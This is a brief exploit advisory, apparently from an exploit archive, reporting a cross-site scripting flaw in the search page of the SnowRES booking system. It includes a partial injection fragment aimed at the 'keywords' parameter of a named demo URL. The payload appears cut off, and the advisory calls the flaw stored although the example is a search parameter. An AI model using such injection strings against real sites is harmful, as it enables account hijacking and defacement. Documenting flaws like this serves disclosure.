# Exploit Title: SnowRES - Accommodation Booking System Stored XSS # Date: 2011 # Author: Eyup CELIK # Version: All Version # Tested on: All versions are Vulnerability ISSUE Cross Site Scripting can be done using the command input Vulnerable Page: advanced_search_result.php (Search Modules) Exploit: "/>

Demo: http://demo.snowtech.com.au/snowres/advanced_search_result.php?keywords="%2F><%2Fa><%2F>